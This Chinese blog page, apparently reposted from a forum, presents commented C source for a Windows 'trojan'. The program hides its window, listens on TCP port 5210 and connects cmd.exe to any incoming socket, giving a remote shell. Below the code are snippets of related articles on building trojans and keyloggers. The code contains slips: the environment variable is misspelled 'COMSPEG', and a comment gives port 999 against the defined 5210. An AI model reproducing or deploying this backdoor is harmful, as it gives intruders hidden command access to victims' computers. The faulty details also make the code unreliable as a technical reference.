木马程序

最新推荐文章于 2024-07-18 10:27:19 发布
最新推荐文章于 2024-07-18 10:27:19 发布
阅读量633 收藏 3
点赞数 1

转载自zusheng:http://bbs.ichunqiu.com/thread-6935-1-1.html?from=jkttcold


#pragma comment(lib,"ws2_32.lib")  //这里我们静态加入一个lib文件,也就是ws2_32.lib</font>


#pragma comment(linker,"/subsystem:\"windows\"/entry:\"mainCRTStartup\"") //设置连接器选项


#include <winsock2.h> //包含头文件winsock2.h,这个是 windows socket的头文件


#include <windows.h> //常用的,不解释


#define MasterPort 5210 //定义一个常量,也就是我们后面要打开的端口


main()   //主函数不解释
{
        WSADATA WSADa;    //这个结构被用来存储被WSAStartup函数调用后返回的Windows Sockets数据。后面的基本上差不多就不解释,不懂请大家自行百度
        sockaddr_in SockAddrIn; 
        SOCKET CSocket,SSocket;
        int iAddrSize;
        PROCESS_INFORMATION ProcessInfo;
        STARTUPINFO StartupInfo;
        char szCMDPath[255];
//分配内存,初始化数据
        ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
        ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
        ZeroMemory(&WSADa,sizeof(WSADATA));


        //获取cmd路径
        GetEnvironmentVariable("COMSPEG",szCMDPath,sizeof(szCMDPath));


        //加载ws2_32.dll
        WSAStartup(0x0202,&WSADa);


        //设置本地信息和绑定协议,建立socket,代码如下:
        SockAddrIn.sin_family = AF_INET;
        SockAddrIn.sin_addr.s_addr = INADDR_ANY;
        SockAddrIn.sin_port = htons(MasterPort);
        CSocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);


        //设置绑定端口999
        bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));


        //设置服务器端监听端口
        listen(CSocket,1);
        iAddrSize = sizeof(SockAddrIn);


        //开始连接远程服务器,并配置隐藏窗口结构体
        SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);


        StartupInfo.cb = sizeof(STARTUPINFO);


        StartupInfo.wShowWindow = SW_HIDE;
        
        StartupInfo.dwFlags = STARTF_USESTDHANDLES |


        STARTF_USESHOWWINDOW;


        StartupInfo.hStdInput = (HANDLE)SSocket;


        StartupInfo.hStdOutput = (HANDLE)SSocket;


        StartupInfo.hStdError = (HANDLE)SSocket;
        
        //创建匿名管道:


        CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &StartupInfo, &ProcessInfo);


        WaitForSingleObject(ProcessInfo.hProcess, INFINITE);


        CloseHandle(ProcessInfo.hProcess);


        CloseHandle(ProcessInfo.hThread);


 


        //关闭进程句柄:


        closesocket(CSocket);


        closesocket(SSocket);


        WSACleanup();


          //关闭连接卸载ws2_32.dll


        return 0;


        }

Yasin_ddy
关注
c语言写木马程序,用c语言写的木马(详细)
weixin_39858275的博客
05-17 2130
private void InitializeComponent(){//// Form1////窗体显示的起点和大小this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);this.ClientSize = new System.Drawing.Size(368, 357);//窗体名称this.Name = "Form1";//设置属性让...
LDM木马检测程序(反木马) v8.1.802
03-13
软件介绍 一款专业的反木马软件.它拥有三套查杀引擎,不仅可以查杀国内外的木马,还可以查杀未知木马、间谍程序、广告软件,并带有网络实时监控功能的"防御监视模式"和"系统监控"等防御系统,不但能抵御各种不良信息与木马的入侵,而且还能反击黑客!内部集成的十套安全软件,从 IE修复到桌面安全,全面保护您的电脑系统不受侵害.强大的在线升级,总能保持查杀木马的先进性!强大的功能与简单的操作方法,必定能使用户全面了解计算机的系统环境,轻松解决所有安全问题。
木马程序(病毒)
m0_49025459的博客
01-28 3004
"特洛伊木马"(trojan horse)简称"木马",据说这个名称来源于希腊神话《木马屠城记》。古希腊有大军围攻特洛伊城,久久无法攻下。于是有人献计制造一只高二丈的大木马,假装作战马神,让士兵藏匿于巨大的木马中,大部队假装撤退而将木马摈弃于特洛伊城下。城中得知解围的消息后,遂将"木马"作为奇异的战利品拖入城内,全城饮酒狂欢。到午夜时分,全城军民尽入梦乡,匿于木马中的将士开秘门游绳而下,开启城门及四处纵火,城外伏兵涌入,部队里应外合,焚屠特洛伊城。后世称这只大木马为"特洛伊木马"。
木马程序的原理
最新发布
TuokooX的博客
07-18 365
木马程序是一种恶意软件,它通常伪装成合法的应用程序,以便在用户不知情的情况下执行非法操作。本文将简要介绍木马程序的构成和功能,并提供一些示例代码,帮助读者更好地理解木马程序的工作原理。木马程序是一种严重的安全威胁,了解其工作原理和防范措施是保护自身安全的重要步骤。以下是一个简单的Python示例,展示如何创建一个基本的客户端程序,该程序可以接收来自服务器的命令并执行。以下是一个简单的C++示例,展示如何创建一个基本的客户端程序,该程序可以接收来自服务器的命令并执行。
木马程序的制作
热门推荐
自学编程_youkewang.top
03-08 3万+
0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你的系统,窃取你的隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马的制作. 实验环境:一台Win7SP1和一台WinXPsp3+Backtrack5. 使用工具有:msfpayload+msfencode.   0x01:使用msfpayload windows/mete
黑客攻击-木马程序(1)
helloworlddm的博客
06-28 1万+
声明:本篇内容,禁止用作非法目的,谢绝一切形式的转载。 当你在无意间点击一个链接后,当你在不明情况安装一个程序时,当你忍不住点击一个美女图片的时候,你的设备可能就此沦陷了,成为了黑客眼中的"肉鸡"。 kali Linux Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack
用C#实现木马程序
weixin_33725515的博客
11-16 154
要实现木马服务的程序,主要实现以下几个功能:后台的运行(隐藏技术),控制码的接收与注册表的修改,下面对这三方面做介绍:   1、在VC#中,建立一个后台服务程序是很容易的,先建立一个新的C#的Windows应用程序,项目名称自定(不过为了隐藏可使用与系统相近的名称),将窗体属性“ShowInTaskbar”属性设为false,让它运行时不会在任务栏中...
一个简单的木马程序分析
weixin_47633814的博客
12-04 3152
目录Mini木马的基本原理 Mini木马的基本原理 Mini木马作为早期的远程控制类木马,基本工作原理是基于TCP的Socket技术,
Python开发木马程序-内含源码以及设计说明书(可以自己运行复现).zip
05-08
**Python木马程序开发详解** 在信息技术领域,"木马程序"一词通常指的是隐藏功能的恶意软件,它伪装成合法程序,以欺骗用户执行,从而获取对目标系统的控制权。本教程将深入探讨如何使用Python语言开发木马程序,...
Linux中查找php木马程序例子
01-20
只是我们给了权限太高导致这个程序可以执行系统文件或调用系统命令来操作从而得到了服务器相关权限了,这样对方可以随时拿我们程序或数据库了,下面我来给各位介绍一些查找php木马的方法与基本的安全配置教程吧。...
Python告诉你木马程序的键盘记录原理
09-19
今天小编就为大家分享一篇关于Python告诉你木马程序的键盘记录原理,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
病毒实验四木马病毒实验
12-06
了解木马程序的结构、传播方法、安装与自启动机制,加深木马病毒原理的认识;掌握木马病毒的查杀一般方法。
c语言简单木马源代码,【C语言】后台木马程序
weixin_28909295的博客
05-25 2439
该楼层疑似违规已被系统折叠隐藏此楼查看此楼DWORD dwWrited = 0, dwRecvd = 0;char szBuf[MAX_PATH] = {0};BOOL bRet = FALSE;while ( TRUE ) {dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);if ( dwRecvd > 0 && dwRec...
木马程序的技术分析与研究
crfoxzl的专栏
01-02 1156
近年来,黑客技术不断成熟起来,对网络安全造成了极大的威胁,黑客的主要攻击手段之一,就是使用木马技术,渗透到对方的主机系统里,从而实现对远程 操作目标主机。 其破坏力之大,是绝不容忽视的,黑客到底是如何制造了这种种具有破坏力的木马程序呢,下面我对木马进行源代码级的详细的分析,让我们对木马的开发技术做一 次彻底的透视,从了解木马技术开始,更加安全的管理好自己的计算机。  1、木马程序的分类  
linux下木马程序病原体的制作和运行
weixin_40501323的博客
12-27 4807
1.木马的制作: 首先我们可以在/usr/bin/目录下创建一个源程序muma,输入 你所需要指定的代码,这里为了做实验就随便写了个,你也可以换上一些挖矿程序,ddos攻击代码,为了知道木马是否运行,我们可以加入一条指令echo 'date' >> /tmp/date.txt,这样如果木马程序运行,我们就可以在tmp/date.txt下看到内容date。sleep 1 是指这段代码多长时间执行一
木马概述
0pt1mus
02-05 1309
转自个人博客:super.j的博客 0x00 木马概念 这篇主要讲的是木马的隐藏和发现技术。偏综述,没有具体的技术。 名词解释: 名词 解释 木马 隐藏在正常程序中的有特殊功能的恶意代码,如破坏删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。 病毒 编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。具...
二进制安全之木马程序简介
weixin_51339377的博客
03-17 1055
当作(计算机会把不同的程序作为什么类型的文件和不同的方式来进行执行) 文件头的作用: 告诉系统,把下面的二进制代码,当作什么来执行!!!! 操作系统为了方便用户使用,使用后缀名这个机制: .exe .dll .jpg .jpeg .png .avi .mp3 .mp4.... 逆向工程工具:C32 协议: 李老师协议: 协议头001100->内容1->结束语1111 001100 xxxxxxxxx xxxx xxxx xxxxx 1111 0101110101
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值